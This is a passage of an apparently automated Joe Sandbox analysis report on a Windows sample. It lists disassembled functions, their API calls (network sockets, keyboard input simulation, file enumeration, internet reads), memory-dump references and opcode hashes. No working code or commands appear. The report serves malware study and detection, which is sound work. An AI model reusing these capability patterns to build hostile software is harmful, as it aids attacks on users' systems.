                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007B9235
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9244
                                                                                                                                        • bind.WS2_32(00000000,?,00000010), ref: 007B9260
                                                                                                                                        • listen.WS2_32(00000000,00000005), ref: 007B926F
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B9289
                                                                                                                                        • closesocket.WS2_32(00000000), ref: 007B929D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                        • Opcode ID: f967cf24a0355db33c030ecc0c10e2f83fcd8635802202b9eac06f2d7f467e0f
                                                                                                                                        • Instruction ID: e92d7bc47377b0460e41f7ed4f612b8f165a4b2cba80f2f76757bd813da54dba
                                                                                                                                        • Opcode Fuzzy Hash: f967cf24a0355db33c030ecc0c10e2f83fcd8635802202b9eac06f2d7f467e0f
                                                                                                                                        • Instruction Fuzzy Hash: B2219635600200EFCB10EF64CC89BAE77A9FF49324F108159FA66AB391CB38AD41CB51
                                                                                                                                        Function 0076A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0078010A: std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                          • Part of subcall function 0078010A: __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                        • _memmove.LIBCMT ref: 007D3020
                                                                                                                                        • _memmove.LIBCMT ref: 007D3135
                                                                                                                                        • _memmove.LIBCMT ref: 007D31DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1300846289-0
                                                                                                                                        • Opcode ID: ae06e1ac790412df7deeb8adbbdb7a07ad74561998b28a1edfb9c8dc8cc76e9b
                                                                                                                                        • Instruction ID: 39735249e2211a952a60918885a20e7bc27693a37f6daf6fe098ee77a6bdbf20
                                                                                                                                        • Opcode Fuzzy Hash: ae06e1ac790412df7deeb8adbbdb7a07ad74561998b28a1edfb9c8dc8cc76e9b
                                                                                                                                        • Instruction Fuzzy Hash: CB029170A00209EFDF04DF64C985AAEB7B5FF49340F14C469E806EB255EB39DA15CB91
                                                                                                                                        Function 007B96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007BACD3: inet_addr.WS2_32(00000000), ref: 007BACF5
                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 007B973D
                                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 007B9760
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4170576061-0
                                                                                                                                        • Opcode ID: a3982aedd6e9e09493815447b622faa280a26d01d82ba6a79551dde9b5d961f6
                                                                                                                                        • Instruction ID: 2cae44c65f6ac46fca7c04cf19d473202e45ede40a7142994d3fdfb79701e31e
                                                                                                                                        • Opcode Fuzzy Hash: a3982aedd6e9e09493815447b622faa280a26d01d82ba6a79551dde9b5d961f6
                                                                                                                                        • Instruction Fuzzy Hash: E741B670600100EFDB14AF68CC8AE7E77EDDF48764F148158FA56AB392DB789E018B91
                                                                                                                                        Function 007AF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 007AF37A
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AF3AA
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AF3BF
                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 007AF3D0
                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007AF3FE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2387731787-0
                                                                                                                                        • Opcode ID: c047a2d73fcffa17363eb996dcc16a7c35ef619cea440a869365b98ca59204d5
                                                                                                                                        • Instruction ID: f6e7b66db42c75dda84495b06779ec31a1ad491fd1c43218c0feec66e54a1790
                                                                                                                                        • Opcode Fuzzy Hash: c047a2d73fcffa17363eb996dcc16a7c35ef619cea440a869365b98ca59204d5
                                                                                                                                        • Instruction Fuzzy Hash: 1241B175600301DFCB18DF68C494A9AB7E4FF8A324F10426DE95ACB3A1DB39AD45CB91
                                                                                                                                        Function 007A4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007A439C
                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 007A43B8
                                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 007A4425
                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 007A4483
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 432972143-0
                                                                                                                                        • Opcode ID: 763de6607eca7dbff306e257e36c11433be223fc06eee328135f3c5fa74f2ca6
                                                                                                                                        • Instruction ID: 3acb8c1f2cf681ace0c90b15c8792592722b438e93c30f1d9c4e8879e59f55c1
                                                                                                                                        • Opcode Fuzzy Hash: 763de6607eca7dbff306e257e36c11433be223fc06eee328135f3c5fa74f2ca6
                                                                                                                                        • Instruction Fuzzy Hash: B04117B0900288AAEF308B65D8497FD7BB5ABCE311F04031AF481972C1C7FE8D859B65
                                                                                                                                        Function 007CEFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CEFE2
                                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007DF3C3,?,?,?,?,?), ref: 007CEFF7
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007CF041
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,007DF3C3,?,?,?), ref: 007CF077
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1423138444-0
                                                                                                                                        • Opcode ID: 74b960f3a202fcd7ed730b656881d213355082408c1c8105000058198c50f39b
                                                                                                                                        • Instruction ID: f5c627573ed33b3279af891719d1e50f346ff79de075dc78a1d964c148927ca2
                                                                                                                                        • Opcode Fuzzy Hash: 74b960f3a202fcd7ed730b656881d213355082408c1c8105000058198c50f39b
                                                                                                                                        • Instruction Fuzzy Hash: 28219135600118EFCF258F58D898FEA7BB6FB49B54F14806DF9054B2A2C3399D91DB90
                                                                                                                                        Function 007A220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007A221E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: ($|
                                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                                        • Opcode ID: 64e18646818a69c3fce3c3cd1d6cc6682635905325b9ad0dcd83496f05f01749
                                                                                                                                        • Instruction ID: 4de386bd47590cb49a26eaedbd2fe7feb92d1b058403ae68d02258155d02cb07
                                                                                                                                        • Opcode Fuzzy Hash: 64e18646818a69c3fce3c3cd1d6cc6682635905325b9ad0dcd83496f05f01749
                                                                                                                                        • Instruction Fuzzy Hash: C5324875A00605DFCB28CF59C480A6AB7F0FF89320B11C56EE59ADB7A2D774E942CB44
                                                                                                                                        Function 0077AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0077AE5E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                        • Opcode ID: 4ed5be09e90809581d7287018564359b042fd243c8d039dc477c46d9f10b3be2
                                                                                                                                        • Instruction ID: b17c129045e661d9a0d13c214ab0c6b3c52e3a91ac51b900ab7f2674d2dcf072
                                                                                                                                        • Opcode Fuzzy Hash: 4ed5be09e90809581d7287018564359b042fd243c8d039dc477c46d9f10b3be2
                                                                                                                                        • Instruction Fuzzy Hash: 59A1F760104244FAFF38AA295C8EE7F3A6DEBC57C5B11C53EF40AD62A1CA5D9C019273
                                                                                                                                        Function 007B550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007B4A1E,00000000), ref: 007B55FD
                                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B5629
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 599397726-0
                                                                                                                                        • Opcode ID: 7bce033e1c49e84b4049e9368bf6d635dcd748a13e068e69c7f7fbd355cf58c7
                                                                                                                                        • Instruction ID: 2ecf2ce5058ec1d50775229ab9690d2dee0b61808a2db1c40a563656edb681cd
                                                                                                                                        • Opcode Fuzzy Hash: 7bce033e1c49e84b4049e9368bf6d635dcd748a13e068e69c7f7fbd355cf58c7
                                                                                                                                        • Instruction Fuzzy Hash: 8841C171900609FFEB209E94DC89FFFB7BEEF40729F10401AF605A6180DA789E419B64
                                                                                                                                        Function 007AEA85 Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 007AEA95
                                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AEAEF
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AEB3C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1682464887-0
                                                                                                                                        • Opcode ID: b8701acd97470ce238274596d5803b1c83daec941e957f658b37c858f1843d80
                                                                                                                                        • Instruction ID: 173df115c5bb1f67ed5303637c4d7c23b21e932284e50935f7229e734ebae5e6
                                                                                                                                        • Opcode Fuzzy Hash: b8701acd97470ce238274596d5803b1c83daec941e957f658b37c858f1843d80
                                                                                                                                        • Instruction Fuzzy Hash: 72216075A00218EFCB00EFA5D894EEDBBB9FF89310F148099E905AB351DB35D915CB50
                                                                                                                                        Function 007A702F Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A704C
                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 007A708D
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 007A7098
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 33631002-0
                                                                                                                                        • Opcode ID: b58fd56f555fbeab0c0a5cf733560b49116315cbb099bfd62d956291fc3c671b
                                                                                                                                        • Instruction ID: 053011fc4eb8682fa3074be83f64f1a3a5a6f3ca239b0b6c3de27d3c13f08fb0
                                                                                                                                        • Opcode Fuzzy Hash: b58fd56f555fbeab0c0a5cf733560b49116315cbb099bfd62d956291fc3c671b
                                                                                                                                        • Instruction Fuzzy Hash: E4115E71E01228BFEB148F94DC45BAFBBBCEB49B10F108152F900EB290D7B45E018BA5
                                                                                                                                        Function 00766670 Relevance: 4.1, APIs: 2, Instructions: 1093COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                        • Opcode ID: fa357addac245d6f37c7e672d038762b9f09d1b4f2afe930d14575c804d134ad
                                                                                                                                        • Instruction ID: 39555c00c6e7332ec67602240b41b7badcb755ddc3277f1e17b2fc0f14cbd5d5
                                                                                                                                        • Opcode Fuzzy Hash: fa357addac245d6f37c7e672d038762b9f09d1b4f2afe930d14575c804d134ad
                                                                                                                                        • Instruction Fuzzy Hash: 72A27D74E01259CFCB28CF59C4806ADBBB1FF48314F65816AD85AAB391D7789E81CF90
                                                                                                                                        Function 0077AFB4 Relevance: 3.1, APIs: 2, Instructions: 82nativeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0077AF8E
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • GetParent.USER32(?), ref: 007DF4B5
                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,0077ADDD,?,?,?,00000006,?), ref: 007DF52F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 314495775-0
                                                                                                                                        • Opcode ID: ef0d74014f8ec340da9427d4483afdc6a1c1f1e21f46e9da65f6156c2cf76efe
                                                                                                                                        • Instruction ID: 3f7e2dfa233c0d640b37c26a01967b3e0f8e3e7aa3d7832babfa67c9517a1f35
                                                                                                                                        • Opcode Fuzzy Hash: ef0d74014f8ec340da9427d4483afdc6a1c1f1e21f46e9da65f6156c2cf76efe
                                                                                                                                        • Instruction Fuzzy Hash: 81217531200148AFCF348F68D888BAA3BA2EF493A0F188265F52A4B2E2D7345D51D710
